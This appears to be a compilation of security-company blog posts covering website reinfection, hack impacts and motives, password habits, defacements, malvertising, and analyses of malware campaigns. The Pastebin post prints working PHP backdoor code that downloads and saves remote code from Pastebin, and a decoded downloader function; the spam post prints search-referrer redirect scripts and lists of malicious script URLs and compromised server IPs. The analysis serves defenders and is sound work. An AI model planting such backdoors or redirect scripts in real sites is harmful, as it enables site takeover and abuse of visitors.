Why Website Reinfections Happen

why-does-your-website-keep-getting-reinfected

I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It’s this idea that regardless of you are you must always know the foundation that makes this company work. After a month of this training, I made some very interesting observations through my interactions with some of our clients and felt some might find it interesting. This might be new to some, and not so new to others, but for me it was fascinating and worth a share.

I will note that I was like many of you a month ago, I operated my own website, and still do, and came to know of Sucuri because my own website had been hacked. Such is the circle of life that I now work at this fascinating place. Here are some of my observations and I hope they help someone.

1. Passwords

It is important to understand that whenever you create a website, even before you actually register your domain name, one thing should be at the top of your list: create a good password. Our friends at WPEngine put together a fascinating post unmasking the psychology behind passwords, if you have time, give it a once over. On that note, always use correctly generated passwords. Where?

Short answer: everywhere passwords are required.

Longer explanation:

  • On your registrar account. We see many examples of domains being DNS-spoofed because the domain registrar account was hacked. (See the recent Lenevo.com case).
  • On your website hosting account. There have been multiple instances where existing customers returning for another cleanup, on the same website, were still using the old credentials they had when they initially asked us to help them. Despite the fact that we always tell customers to change their passwords after a cleanup, many don’t.
  • On your computer. Make sure you always set up your computer to use a username and password to log-on, never leave it unlocked when you step away from it and make sure you’re employing best practices with your passwords. Hackers are not always trying to directly connect to your website. Instead, they will try to use possibly damaged installations of softwares like FileZilla or Total Commander, to steal your FTP credentials and log into your website with the correct username and password, stolen from your computer.

Remember, employ Complex Long and Unique passwords at all time, do not use the same password across all your online profiles and most important, if you’ve been infected and you get help getting it clean, update all passwords the minute it’s done.

2. Shared Environments

One of the biggest contributing factors to reinfections are shared environments. We’re not talking to shared versus dedicated hosting, instead accounts in which have multiple installations within them. Imagine a hosting account in which you install 10, 20, maybe 100 different CMS applications. These are considered soup kitchen servers, and they are ripe to be exploited.

What often happens is we forget what we’ve installed and in the process leave the sites to their own demise. Over time, they become out of date and some, unfortunately, fall susceptible to a weakness like a vulnerability. As are the things on the web, at some point one of those weaknesses is identified via the relentless bots crawling the web. Once identified, they get exploited. Once in the environment, via a method we call lead frogging (also known as cross-site contamination) they infect all neighboring sites, inevitably affecting your good website.

Where this plays a role is that often a website owner will clean the good website, assuming that is where the weakness is. Only to find out, after much troubleshooting that the weakness is actually in a neighboring site – leading to continuous reinfection cases.

Lesson?

Stop operating soup kitchen servers, if one website is infected on the server, assume they all are and get them all cleaned. If you can’t, then it might be time to do some spring cleaning.

3. Do Not Assume You Cannot Be a Target

If you’re thinking that your website is just a personal blog, school project, presentation website or small business services, and by definition that is not a target for hackers, you are wrong. I encourage you to read our recent post on Why Website Get Hacked as it’ll help provide perspective.

Most attacks are not targeted attacks. You’re just a part of a script being targeted upon a large number of websites and servers, where the hackers are looking to find vulnerabilities and they’ll strike. Most of the times this is done with automated tools. They can find and infect your website in minutes.

Being hosted on the server where a targeted website is also hosted will cause problems to all websites hosted there, if the server is not correctly patched and secured/hardened.

4. Complex Structures

I can think of one case where I imagined the client having gone through this process:

  • Setup a Joomla CMS to power the main website.
  • Create a WordPress website inside the Joomla folder, let’s call it ./wiki/ because he found a great wiki theme for WordPress and thought he would use it for that.
  • Add a subdomain subdomain1.maindomain.com and use it as a backup folder for main site.

Now, we already see three possible problems due to the different types of platforms being used. The time and effort required to maintain this type of configuration is very time consuming, be sure to account for this when deploying your configuration.

It’s easy if you’re not very technical, to lose track of which files belong where, which CMS is up-to-date and which isn’t. Not all CMS applications are treated equal.

5. Learn the Basics of Your CMS

To avoid the mess above, start by learning the structure and names of the core files that come with the CMS of your choice.

What does the original archive downloaded from the platforms website contain? Visualize the files, their names and extensions.

Let’s look at WordPress for instance, we all love and use it, right? This is what a clean WordPress install folder looks like, when seen via my FTP client:

Core WordPress Files viewed in FTP program

Core WordPress Files viewed in FTP program

The wp-config.php file contains the information enabling WordPress to connect to the server and the database to store content and data. Attackers will create additional files or folders in your website, having similar names as the clean WordPress files. So paying attention to them will help you determine which files could potentially have been added by the intruder. Remember, wp-config.php is not the same as wp-configs.exe or config-wp.php.

Never feel inadequate or inferior for not knowing your way around a server or website dashboard. Always ask for professional help if you need it, contrary to popular belief, website security is not a Do It Yourself (DIY) project.

6. Backups

Never store backups in the publicly accessible folder. Never have backups on the same physical location as the main website. Something will always happen and both the website and the backups folder you rely on could be deleted.

Make sure you are securely saving your website data on protected backup services, which will allow for easy data-retrieval in the event of an attack. There are many services available, we have one for existing clients, but you can find a number of them on the market. The biggest mistake we see are website owners never employing a backup service, when an infection is so bad that the attacker deletes existing code, it’s impossible to recover without a good backup.

My Website Security Journey Continues

I hope these 6 tips help someone, they may feel foreign, but don’t worry, there is plenty of help available. Remember, there is no such thing as a 100% security solution. The difference is like getting sick and visiting the doctor. You can follow the prescribed treatment and take the pills, or say, “I don’t care about what this doctor thinks” and continue to get sick again and again.

The same thing happens to websites. Untreated, uncleaned, not “medicated” correctly, can lead to the same problems reappearing. So be on the safe side, learn about your mistakes, correct your security habits, keep your system updated, use correctly configured security services and you’ll reduce your overall risk, helping you avoid becoming a recurring victim.

The Impacts of a Hacked Website

Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website.

We are failing each other, we are not setting ourselves up for success. We are learning the hard way, what large organizations already learned – being online is a responsibility and will eventually cost you something.

I recently shared a post talking to the motivations behind hacks. This post was important as it helped provide context and I encourage you to spend some time digesting the information. What it fails to do however, is what I want to focus on in this post.

What are the impacts of these hacks to your website? To your business?

The Effects of a Hacked Website

If you are a large organization, maybe you can quickly understand the impacts of a hack. Say you’re a Facebook? What would be the value for a hacker? I’d argue a couple of things come to mind quickly – you have what is known as Personal Identifiable Information (PII) – always a good thing, and you have the ability to abuse the largest network in the world and affect millions of users world wide. There are obviously a number of other motivations, but the point is the same. The objective[s] is clear and Facebook knows it, and so they invest heavily in its security. The impacts of such a breach could be devastating, think loss in ad revenue, loss in user adoption, etc… This is all common sense, right? It all just makes sense, but how does that translate to the rest of the online world? The 99% of us that don’t own Facebook like properties?

When I speak to website owners, there is often a common trend with the responses I get:

I don’t sell anything or store any information, my website is fine.

or

It’s just a basic little site, with static content.

This is not their fault. To a certain extent, they do have a point. When you think about it rationally, why would someone bother? Fortunately, in my last post I explained why they would. In those one though let’s talk about 4 potential impacts after a hack. Things you might be aware of, but honestly possibly things you haven’t given much thought to.

1. Be Mindful Of your Audience

Maybe you write about puppies, or maybe have a website to provide your clients the assurances that you are real. Whatever the reason, something has driven you to publish something that you feel to be of some interest to someone, and you’re likely right.

In doing so, you have identified a potential audience, and as it is on the web, that audience will at some point find your website. Whether you are a local gym posting your gym hours, or maybe a local restaurant showing today’s specials. The subset of people that have found their way to your website expect and demand a safe experience, even if they’ve never uttered the words.

The easiest way to digest this point is to think of yourself. Think of the websites you might spend your days visiting. Now try to fathom your feelings if while visiting a website you lost your life savings. Try to think of what you would feel like if someone stole your identity.

Should we worry about giving your visitors a safe online experience?

2. Google Does Not Discriminate

Contrary to popular belief, Google does not discriminate. Even if you do not sell, you are likely trying to achieve something. If you’re not, then why are you online? Whether it’s establishing a voice, sharing an opinion, or having a presence. What you are almost always worried about is something known as Search Engine Optimization (SEO), more importantly how you rank on the Search Engine Result Pages (SERP).

Safe Browsing shows people more than 5 million warnings per day for all sorts of malicious sites and unwanted software, and discovers more than 50,000 malware sites and more than 90,000 phishing sites every month. – Google

What if I told you that you could lose all the hard work you put in to gain that SEO ranking in minutes? What if I told you that after a blacklist it could take you months to regain your position on these SERPs? What if I told you that a Google Blacklist has the potential to kill almost 95%, if not more, of the traffic to your website?

3. Something Known as Brand Reputation

Regardless of your business, you have a brand. Whether you realize it or not, and regardless of the size of your audience, trust is an important piece of the puzzle. Many take this for granted, but it’s critical to the success of many businesses.

It can take years to build, and minutes to lose. A hacked website is notorious for destroying trust. Whether its a data breach or a drive by download that infects the visitors desktop. The result of either action, or one of many more nefarious acts, will almost always lead to the same thing – a loss of trust in your brand.

Are you ok if your audience loses trust in your brand?

4. Hacks Cost You More Than Money

I think it’s human nature to think, “This is not meant for me” or “I’ll just deal with it when it happens.” I can tell you though, from years of doing this work and countless engagements with website owners, the cost of a hack is always more than you can ever imagine. The response I always get is the same, “If I only knew it would be this painful.”

As a species, we are risk adverse when it comes to gains, but risk seeking when it comes to loss… – Bruce Schneider

When I say cost, it’s important to note that it goes far beyond money, although that can be crippling as well.

No, instead I am talking about things you will likely never appreciate until you experience it. Things like the emotional toll of not knowing what just happened. Things like the hours you will spend arguing with hosting providers, developers, security professionals; if they would all just understand how important it is to get back online. Things like the fear that you missed something in the clean up process, which only becomes worse if you did and suffer repeated reinfections. Things like the new fear of being online at all, of technology as a whole. All this is exasperated by one simple thought, “Why didn’t I take precautions?”

As surreal as these sound, these are the real costs of a hack. The money is easy to account for, as a business you take that risk; the smaller a business, the more likely you are to take the risk, the larger you are, the more foolish it is to take the risk. It’s the non-monetary impact that catches everyone off guard.

Are you emotionally and mentally prepared for a hack? Is your business?

Accounting for Website Security Is Always a Challenge

When did running a business become so challenging? Trust me, I know the feeling. Everyday I ask myself the same thing. When will the expenses end? Purchase this tool, configure this feature, hire more people. It’s an endless cycle, yet a necessary one. As business owners it falls on our shoulders to make these decisions.

For me, there is nothing worse than getting caught with my pants down. This is exactly what I hear from our clients. No one ever told me I had to think about my websites security. No one ever told me this could impact my business.

I hope this post helps address those points. Leverage these insights to make a better decision. If you can honestly say that known of the four items mentioned above are of any value to your business, then I encourage you to continue with the status quo. If though, for whatever reason, they resonate, then maybe it’s a good time to start asking more engaging questions to your technical staff.

A question like, What do we do for the security of our website?

I’ll close the point with a note to Developers / Designers. Our clients depend on us as their trusted technologists, it’s on us to educate and communicate the realities of having an online presence. Let’s be sure to be doing our part by introducing realistic expectations during the initial engagement process: Yes, the website will require maintenance. Yes, security is something you will be responsible for. Yes, having a website is a responsibility.

– Your Trusted Security Team

Tony

Why Websites Get Hacked

I spend a good amount of time engaging with website owners across a broad spectrum of businesses. Interestingly enough, unless I’m talking large enterprise, there is a common question that often comes up:

Why would anyone ever hack my website?

Depending on who you are, the answer to this can vary. Nonetheless, it often revolves around a few very finite explanations.

Automation is Key

Understand that the attacks affecting a large number of website owners in the prosumer (a term I’m using to describe those website owners in micro- small – and medium sized business space leveraging platforms like WordPress, Joomla and others) are predominantly automated. I wrote an article on the subject back in 2012, it’s important to revisit the subject as it’s still very relevant today.

The benefits of these automated attacks have not changed, they still provide the attackers the following benefits:

  • Mass Exposure
  • Reduces overhead
  • Tools for everyone regardless of skill
  • Dramatically increases the odds of success

It is not to say that these attacks are never manual, but for the mass majority, automated attacks are what we see during the initial phases of the attack sequence. When I say attack sequence I am referring to the order of events an attacker takes to compromise an environment.

A very simple illustration of the sequence would look something like:

  1. Reconnaissance
  2. Identification
  3. Exploitation
  4. Sustainment

The attack sequence can have varying levels of complexity depending on the group of attackers. When working with everyday websites, the most effective way to affect the largest number of websites at any given time would be with the deployment of scripts and bots during steps one and two. Although not always a manual process, steps three and four often have a tendency to have more manual elements to them, although many can be automated as well. While thinking of how these attacks occur, it is important to note the two forms of attack categories; attack of opportunity and targeted attack.

Attack of Opportunity

Almost all prosumers fall within the realm of opportunistic attacks. Meaning that it is not any one individual that is intentionally trying to hack your website, but rather a coincidence. Something about your site was caught by the trailing net as they randomly crawl the web. It could have been something simple like having a plugin installed, or maybe displaying the version of a platform.

In our analyses, we have found that it takes about 30 – 45 days for a new website, with no content or audience, to be identified and added to a bot crawler. Once added, the attacks commence immediately without any real rhyme or reason. It can be any type of website, the only commonality is that it is connected to the web.

These crawlers then begin looking for identifying markers. Is the website running one of the popular CMS applications (i.e. WordPress, Joomla! etc.)? If yes, is the website running any exploitable software (i.e. software vulnerabilities or bugs in code that can be exploited)? If the answer is yes, then the site will be marked for the next phase of the attack, exploitation.

The sequence of events can happen in a matter of minutes, days or months. It is not a singular event, instead it occurs continuously, always scanning for changes or updates. It is automated, therefore, once your website is on the list it will just continue trying.

Targeted Attack

This is often reserved for the larger businesses, but not always. Think of the NBC hack in 2013, or the recent Forbes hack.There are many examples of these types of hacks lately, and it is apparent why they would be targeted. The level of effort it takes to gain entry into these environments is exponentially more difficult but the gains can be astronomical. That being said, a very common form of targeted attack can be seen in something known as a Denial of Service attack in which the attacker works to bring down the availability of your site – common between competing businesses.

With that in mind, targeted attacks are not always reserved for the big boys. They can be deployed against smaller sites and can be driven by competition or pure boredom and the need for a challenge. These attacks can range from very simple to very complex as well.

Hacking Motivations and Drivers

Now that we have a better appreciation for the How, let’s turn our attention to the Why. That is why you are reading this.

Economic Gains

The most obvious of the reasons is economic gain. This often manifests in attacks known as Drive-by-Downloads or Blackhat SEO campaigns. As you might imagine, these are attempts to make money from your audience.

A Drive-by-download is the act of deploying what is known as a payload (i.e. injecting your website with malware) and hoping to infect as many of your website visitors. Think of your mom or dad visiting your website and the next thing you know, they are calling you because they installed a fake piece of software like you recommended on your website, but this time their bank accounts were drained. Scary, but very real and very devastating.

Blackhat SEO spam campaigns are not as devastating, however, in many instances can be more lucrative. This is the game of abusing your audience by directing them to pages that generate affiliate revenue. This is rampant in the pharmaceutical space, but has also extended to other industries like gambling, fashion and many others. What they do is inject links through your website, sometimes you see them, sometimes you won’t. On the contrary, when it comes to search engines like Google or Bing, they see everything and once those links make it onto the Search Engine Results Pages (SERPs) the attackers begin generating revenue from your audience.

System Resources

There is one motivator, the use of your resources, that many don’t talk about. When referring to resources, I am talking about things like bandwidth and physical server resources. I break this out as its own motivator, but it’s also a group under economic gain. The business of farming system resources is big business and a huge motivator for many cyber groups; they’re able to not only use it as part of their own networks, but build a leasing environment off your stack.

You have likely heard of large botnets and I have also referenced them above. Botnets are nothing more than interconnected systems across the net; they can be desktops, notebooks and even servers – similar to your webserver. They can be employed to perform tasks simultaneously. These can include Denial of Service Attacks, Brute Force Attacks, or even some of the automated attacks mentioned above.

These attacks that target your system resources are dangerous mainly because of their ability to attack without you, the website owner, even realizing it. You go about your day with no worries with your website appearing to be in good standing and with no complaints. Then one day out of the blue, your host shuts you down, your usage bill is through the roof or you receive a notice from the authorities about your hacking attempts.

Hacktivism

This motivator is perhaps the one that’s the hardest to contend with when it comes to getting your head around it. Similar to others, the drivers for these attacks are monetary or abusive. However, they are more finding a way to protest around a religious or political agenda or to show off to peers within the hacking community.

A very common form of this can be identified with Defacements. The point of these attacks often comes down to some form of awareness. This form of attack can be combined with others, but in our experience often are somewhat benign and create more embarrassment to the site owner rather than affecting their users.

Pure Boredom

Something that always catches folks off guard is the idea of people attacking website out of boredom and amusement, but it’s very true. It’s unfair to say they are always young, but a good percentage of the teim they are teens bored at home.

There really isn’t much to say about this other than, put your kids into sports!!

Good Security Begins with Good Posture

It’s easy to feel overwhelmed by some of this information, but it is our belief that the best tool you have at your disposal as a website owner is knowledge. Driving your head into the proverbial sand does not make these things disappear; it simply amplifies the impact if and when any of these attacks affect you directly. I assure you they happen more often than note, and Google agrees being they blacklist close to 10,000 sites a day for malware and flag over 20,000 sites for phishing a month.

Bruce Schneider likes to say:

as a species, we are risk averse when it comes to gains, but risk seeking when it comes to loss.

It is a very true and a very sad sentiment that I have to agree with. It becomes very evident when I speak with website owners and they say, “I have had a website for 10 years, never been hacked, I don’t need to worry about it.” Those also always make for the most interesting and painful conversations when the hack does occur. Some go as far to accuse us, “I was fine then hear you speak, or read your post.” A bit over the top, I agree, but it gives you a very small window in the state of mind once the hack does happen.

I like to think of website security in the form of posture. It is through good posture that you position yourself for success. I take this from my Brazilian Jiu jitsu training, where its through posture that you can help prevent positions that would see you in a lot of pain.

Remember, security is not about risk elimination, but rather risk reduction. You have heard this time and time again, risk will never be zero. You can, however, employ tools and steps to reduce it where you can so as not to become part of the statistic.

The Dynamics of Passwords

passwords

How often do you think about the passwords you’re using? Not only for your website, but also for everything else you do on the internet on a daily basis? Are you re-using any of the same passwords to make it easier to remember them?

We see it all too often: weak passwords used for FTP, database configuration, cPanel, and CMS logins. Everyone has their own password policy, it’s very personal, and usually based on a set of assumptions about online security. Many users choose policies of efficiency over security. Even the paranoid among us have to confront the truth. Like any defensive measure, best practices in password management can only minimize the level of risk.

Password management is a choice, and a habit. By taking a good look at the risks, users can make informed decisions and put better passwords into practice.

History of the Strong Password

Most password strength meters are too soft. The companies that use them know this, but they don’t want users to leave the registration process due to a restrictive password policy. Modern software can guess many so-called “strong” passwords in minutes, and the most common passwords in milliseconds. As password hacking grew in complexity over time, so did the requirements on passwords.


Read More

Creative Evasion Technique Against Website Firewalls

During one of our recent in-house Capture The Flag (CTF) events, I was playing with the idea of what could be done with Non-Breaking Spaces. I really wanted to win and surely there had to be a way through the existing evasion controls.

This post is going to be a bit code-heavy for most end-users, but if you choose to read you’re bound to find it very insightful.


Read More

Website Backdoors Leverage the Pastebin Service

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files.

Here’s the backdoor code:

if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

It’s more or less a typical backdoor. It downloads malicious code from a remote server and saves it in a file on a compromised site, making it available for execution. What makes this backdoor interesting is the choice of the remote server. It’s not being hosted on a hackers’ own site, not even a compromised site — now it’s Pastebin.com — the most popular web application for sharing code snippets.

Technically, the criminals used Pastebin for what it was built for – to share code snippets. The only catch is that the code is malicious, and it is used in illegal activity (hacking) directly off of the Pastebin website. Pastebin.com allows users to download the code in “raw” format (i.e. no HTML, no site UI, just the code — note the raw.php part of the URL).

Here’s an example of a slightly more elaborate backdoor, uploaded via the RevSlider hole:

Decoded backdoor that uses pastebin

Code-downloading backdoor from Pastebin

In the screenshot, you can see that this code injects content of the Base64-encoded $temp variable at the top of the WordPress core wp-links-opml.php file. You can see the decoded $temp content below:

Code-downloading backdoor from pastebin

Decoded backdoor that uses pastebin

Again, you can see that some code is being downloaded from Pastebin.com, saved to a file and immediately executed. This time this only happens when the attacker provides the Pastebin snippet ID in the wp_nonce_once request parameter (which is also used as a file name when they save the downloaded code). The use of the wp_nonce_once parameter hides the URL of malicious pastes (which makes it difficult to block) and at the same time adds flexibility to the backdoor — now it can download and execute any Pastebin.com snippet — even those that don’t exist at the time of injection — you just need to pass their ID’s in the request to wp-links-opml.php.

FathurFreakz encoder

I should also mention that Indonesian hackers have an encoder that was made specifically to work with Pastebin.com. It is called PHP Encryptor by Yogyakarta Black Hat or by FathurFreakz. Basically, they create a paste of their PHP code on Pastebin.com and then specify the URL of the code in the encryptor, which then generates obfuscated code that looks like this:

Encoded specifically for Pastebin

Encoded specifically for Pastebin

If you decode it, you’ll see this:

function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

This code downloads and executes a Pastebin.com paste (xcurl function) with the ID encrypted in the CODE constant. Here, you can see that they use one more special Pastebin.com URL type, download.php, which acts similarly to raw.php, but also provides HTTP headers to prevent browsers from displaying the content to download it as a file instead.

By the way, that hacker group likes using Pastebin.com so much that some of their backdoors look like this (decoded):

Pastebin malware decoded

Pastebin backdoor decoded

Hackers and Pastebin

Pastebin has a long history of being used by hackers of all ranks. Many hacker groups share data stolen from famous companies via the service. Pastes are being used as an anonymous intermediary storage for data stolen from user computers. Some pastes are known to be used in malware attacks – they may contain encrypted addresses and even base64-encoded malicious binary code. Here’s just a few notable headlines from the last 5 years:

This time we see relatively massive use of Pastebin in live attacks, which is quite new to us. This also suggests that we, security researchers, should be more careful when sharing malicious code we find in public pastes – it is easy for hackers to reuse them directly from Pastebin.com. It would be a good idea, before sharing, to make some obvious modification to the code that would prevent its execution when downloaded in a raw format.

2014 Website Defacements

Defacements are the most visual and obvious hack that a website can suffer from. They also come parcelled with their own exquisite sense of dread. Nothing gives that gut-wrenching feeling of “I’ve been hacked” more than seeing this:

Defaced-Website-Upgrade-Security

Most malware that we see on a daily basis is driven by some desire to profit off of victims – classic pharma spam or theft of credit card details and personal information. By contrast, most defacements have little to no financial incentive. They are almost always done to further some political, religious or ideological goal. Some attackers will try to deface as many sites as possible with their ‘calling card’ just to prove how “l33t” (elite) they are or to give attention to whatever cause they are trumpeting.

These hacks remind me of by-gone days when computer hacking was done primarily for mischief and trouble-making and less associated with the nefarious criminal underworld. A lot of the time all that is tampered with is the site’s index.php file which can easily be restored by downloading a fresh copy of whatever CMS you use.

A more nasty defacement, though, will overwrite your wp-config.php file entirely and if you don’t have a backup, well, make one right now for a rainy day :)

Now, having said all this, while all defacements are primarily about the shock value much of the time they are coupled with malware, too. If this ever happens to your site assume it is fully compromised and act accordingly. Whoever defaces a site will almost certainly place a few backdoors for easy access later on. The more harmful hacks will also attempt to infect end user computers visiting the site.

For this reason, if you ever suffer from this sort of calamity make sure you perform a thorough check for any malicious files! Otherwise you’ll likely end up with the same problem soon after.

There are a whole bunch of ways that this can happen – websites that employ poor password management and/or use out of date software are easy, low-hanging fruit for these vandalists. Naturally, our clients using our CloudProxy firewall are protected against such attacks.

Malvertising on a Website Without Ads

When you first configure your website, whether it be WordPress, Joomla, Drupal, or any other flavor of the month, it is often in its purest state. Unless ofcourse the server was previously compromised, which in it of itself is another conversation outright. Barring that one instance, the new website should not exhibit any malicious behavior. Or so you would think.

It’s rare though that a default theme will satisfy your every need, it’s often has just enough to wet your beak and get you thinking of ways to extend functionality. So we set off to extend and leverage all the features our favorite CMS offer us.

Watering Down Core Security

The next steps are to add on, to extend. New themes, plugins, sliders, animated gifs, music… no, wait, that’s too 1990’s. Let’s focus on themes, plugins, templates and various other extensions found in today’s modern CMS applications.

Often, the first thing you have in mind when choosing anything for your website is functionality and aesthetics, right? We all want something that looks great and improves user experience. It may be a really cool theme or the newest social network plugin; it’s not a common practice however to inspect its behavior.

What if one of the add-ons you installed is injecting hidden ads on your site? Or what if they are loading pop-up windows like this one?

HD Video Player Advertisement

Malicious Fake Flash Download

This is exactly what a client recently experienced. After installing a clean install of their CMS, configuring and extending it with a new theme, their website started to present it’s users with a Flash installer. For those wondering, this is fairly common, and is something known as a Drive-by-Download. More on that another time though.

Following The Trail

As is natural for us in the research group we can’t help but get lost in cookie trails, every crumbs proves to be more fascinating than that last.

While investigating, it became apparent that the Flash installer was being loaded via an ad, an ad that was being served via an ad network. Immediately I’m thinking malvertising, right?

In this case, the owner hadn’t configured advertising though and yet it was loading content from an ad network.

For your reference, here’s the HTTP Request showing the ad was being loaded by the infected website.

HTTP Headers of the Malvertising Campaign

HTTP Headers of the Malvertising Campaign

While investigating the code I couldn’t find any reference to the adcash.com domain in either the theme or plugin files. Again, the website owner confirmed that he was not using any ad networks. So that left us no choice but to dig a little deeper, we started to investigate the HTTP traffic.

While intercepting the sites Requests and Responses I came across the following entry:

Sucuri - AdCash

Sucuri – AdCash

It’s a request to hxxp:// 37.187.248.215 that returned a 302 Redirect to adcash.com. Yes, success!!! All right! We are one step closer to the source, I was probably looking for the wrong URL in the source code. Duh… Address noted, let’s keep checking the HTTP traffic.

Checking the HTTP responses for that IP address I found this:

URL Variable in HTTP Headers

URL Variable in HTTP Headers

There it is, the hit counter JavaScript code was loading the ad, as you can see the URL in the uri84 variable. It is making a request here: counter6.statcounterfree.com. This request was causing the popup, but was only being triggered once per visitor and the content looks random, suspicious and, more importantly, unwanted.

Adware or Malvertising?

Turns out that the client did in fact add the counter script to their themes footer, so it didn’t come prepackaged. They were trying to keep track of their visitors, they had no intentions of their site being used to serve ads though.

So being that the source of the counter was www.freecounterstat.com I decided to spend some time familiarizing myself with what they do. I spent some time reading through their End User License Agreement (EULA), you never know what goodness you agree too.

Unfortunately, no luck, nothing related to terms or privacy on the website. So I contacted their support to see if this type of behavior was expected.

Based on their response, I’d argue it probably wasn’t:

Hi,

I turn off popup on your account

chris

This is the message I received from support. There are obviously a number of things with that response that worry me, but now the clients website is clean. Whether intentional or not, it’s hard to say, but I’d likely categorize it as a compromised ad network and a malvertising attack.

Personally, I’d stop using this counter script. It’s obviously very 1990 for one, but more importantly if the solution is to disable ads for this site, but not address the bigger issue of drive by downloads being used via the service, that is very concerning. We’ve written about the dangers third-party scripts and service introduce to your environment, this is another example of that.

Conclusion

It is really hard to keep an online service, and even harder if you are doing this for free, so it is understandable that a service uses the adware model to maintain itself. However, it must disclose this to it’s users and offer them an option to opt out. To do it and not offer a user this options is wrong, and as website owners you must be more diligent.

Always check the terms, EULA and privacy policies of third-party software you are using on your website. If they don’t have them, that’s probably a good sign not to use them. Look for any suspicious terms before agreeing to them. If you need help, or you suspect that a plugin or theme is behaving maliciously, let us know.

We love looking through code and potential issues…:) Hit us up at labs@sucuri.net. Happy hunting!!

IIS, Compromised GoDaddy Servers, and Cyber Monday Spam

While doing an analysis of one black-hat SEO doorway on a hacked site, I noticed that it linked to many similar doorways on other websites, and all those websites were on IIS servers. When I see these patterns, I try to dig deeper and figure out what else those websites have in common. This time I revealed quite a few GoDaddy Windows servers have been pwned by “replica spam” hackers.

Let’s Dig Into Some Numbers

1,782 Domains. I collected 1,782 unique compromised domains that hackers use in this campaign. This list is just a tip of an iceberg and I’ll show why a bit later, so read on.

305 IP Addresses. Those websites are scattered across 305 unique IP addresses (actually 304, if we ignore four domains whose addresses I couldn’t resolve). This means roughly 6 websites per IP, however they are not evenly distributed and while many IPs only have one compromised site, some of the servers have hundreds of them.

Top networks:

  • GoDaddy: 95 hosts (31%) and 1,095 websites ( 61%. )
  • Brinkster: 50 hosts (16%) and 258 websites (14%)
  • Network Solutions: 27 hosts (9%) and 77 websites (4%)
  • Versaweb LLC: 5 hosts (1.6%) and 88 websites (5%)

As you can see, 84% of all websites belong to 4 networks.

Let’s look closer at servers on these networks, but before we do it I’ll show how I find compromised websites.

Cyber Monday Spam

The spam campaign I’m investigating is promoting online stores that sell cheap “replicas” of popular luxury brands like Beats by Dre, Michael Kors, Lululemon, Uggs, Juicy Couture, Moncler, Ray Ban, etc. Most of the doorways are currently optimized for Black Friday and Cyber Monday deals. The typical anchor text they use in their links is something like “michael kors cyber monday” or “uggs black friday“.

These spammy links point to the homepage of compromised websites, which typically have a block of hidden links at the bottom of HTML code:

<div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;"> ... 
30-400 spammy links here ... 
</div>

If the website is vulnerable enough, hackers will install a script that generates completely new spammy pages specifically for search engines and return normal pages for human visitors — cloaking. The “human” versions of the pages have a small script at the very top of the HTML (usually before the tag) that redirects web searchers to spammy sites. It either something like this:

<script>
var s=document.referrer;
if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0)
{
self.location='hxxp://www .jackets pretty .com'; //just one of many domains they use
}</script>

or a similar script, loaded from the spammers’ own server:

<script src="hxxp://nofie.talkmes . com/c/nofie.js" type="text/javascript"></script>

At this point they use the following script URLs:

hxxp://bats . solorule . com/d/bats.js
hxxp://bats . solorule . com/c/bats.js
hxxp://cancher . iamsanver . com/a/cancher.js
hxxp://cancher . letgopub . com/c/cancher.js
hxxp://cancher . sanonsport . com/d/cancher.js
hxxp://luover . unbangs . com/c/luover.js
hxxp://meika . ruvipshop . com/a/meika.js
hxxp://meika . sportruns . com/d/meika.js
hxxp://meika . ruvipshop . com/a/meika.js
hxxp://meika . ukingfans . com/c/meika.js
hxxp://nofie . godalice . com/d/cagode.js
hxxp://nofie . godalice . com/kspe.js
hxxp://nofie . rockenice . com/a/cagode.js
hxxp://nofie . rockenice . com/a/nofie.js
hxxp://nofie . talkmes . com/c/nofie.js
hxxp://ungogo . godleders . com/a/ungogo.js
hxxp://ungogo . leftgod . com/c/ungogo.js
hxxp://ungogo . leftgod . com/c/ungogo.js
hxxp://ungogo . nightleder . com/d/ungogo.js
hxxp://js . xufengonline . com/js/zong.js
hxxp://www . monclerslocker . com/js/style.js

Most of them are on the 173.252.207.166 IP (Take 2 Hosting Inc).

Detection

Any of these variants are easily detected by both Sucuri SiteCheck and Unmask Parasites, so it’s not a problem to check websites and tell whether they are infected or not.

Now that we know how to detect the infection, let’s just test random websites on some of the IPs that have many infected websites (based on my doorway analysis).

For example, let’s take 184.168.152.150 (where I found 25 doorways) and use the Bing’s “ip:” search operator along with the “cyber monday” keyword to find websites on that server: http://www.bing.com/search?q=ip%3A184.168.152.150+cyber+monday. Now you can scan websites for results that point to home pages (/ or index.html). More than 70% of the websites I checked are still infected (the rest either won’t load or have been cleaned already).

Bing Cyber Monday Results

Bing Cyber Monday Results

Compromised Servers

This simple Bing search revealed hundreds of infected websites on that server. I observed the same results for 49 out of 95 GoDaddy servers from my list.

184.168.152.149
184.168.152.150
184.168.152.151
184.168.152.3
184.168.27.116
184.168.27.204
184.168.27.205
184.168.27.206
184.168.27.32
184.168.27.33
184.168.27.34
184.168.27.35
184.168.27.36
184.168.27.37
184.168.27.39
184.168.27.40
184.168.27.41
184.168.27.44
184.168.27.46
184.168.27.47
184.168.27.81
184.168.27.82
184.168.27.83
184.168.46.17
184.168.46.18
184.168.46.74
50.63.196.33
50.63.196.34
50.63.196.35
50.63.196.47
50.63.197.10
50.63.197.12
50.63.197.13
50.63.197.139
50.63.197.140
50.63.197.141
50.63.197.142
50.63.197.144
50.63.197.145
50.63.197.203
50.63.197.206
50.63.197.207
50.63.197.208
50.63.197.6
50.63.197.7
50.63.197.8
50.63.197.9
50.63.202.26
97.74.215.156

